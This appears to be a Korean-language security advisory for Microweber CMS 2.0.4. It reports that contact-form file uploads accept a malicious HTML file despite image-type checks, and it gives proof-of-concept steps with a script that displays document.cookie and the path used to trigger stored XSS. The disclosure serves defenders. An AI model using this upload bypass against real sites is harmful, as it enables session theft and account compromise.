
Microweber 버전 2.0.4는 "악성 파일 업로드"에 취약합니다.
Microweber CMS 버전 2.0.4에서 생성된 양식의 파일 업로드 옵션이 활성화된 경우, 이 필드에 특정 유형의 검증이 적용되어 있더라도 악성 HTML 파일을 전송할 수 있습니다.
이 취약점으로 인해 공격자는 세션 쿠키나 로그인 자격 증명 탈취, 리다이렉트, 멀웨어 설치 등 다양한 악의적인 활동을 유발할 수 있는 스크립트가 포함된 파일을 업로드할 수 있습니다.
Microweber 최신 버전으로 업데이트하세요.
1) Microweber CMS 설치 환경에서 문의 양식이 포함된 페이지를 만들고 파일 업로드 필드를 추가합니다.
2) 아래 내용으로 새 파일을 만들고 poc.htm으로 저장합니다:
<svg></svg>
<html>
<head>
</head>
<body>
<h1>Hi!</h1>
<script>
alert(document.cookie)
</script>
</body>
</html>
3) 양식 페이지에 접속하여 생성한 poc.htm 파일을 업로드합니다.

4) 이제 전송한 파일을 실행하려면 http://yoursite.com/userfiles/media/default/contact_form/poc.htm에 접속하기만 하면 됩니다.
(https://yoursite.com을 테스트 설치 환경의 주소로 바꾸세요.)

참고: 위 단계는 파일 업로드 필드에 "이미지 파일" 및 "jpg"와 같은 "사용자 정의 파일 유형"과 같은 일부 검증 조치가 적용된 경우에도 동작합니다.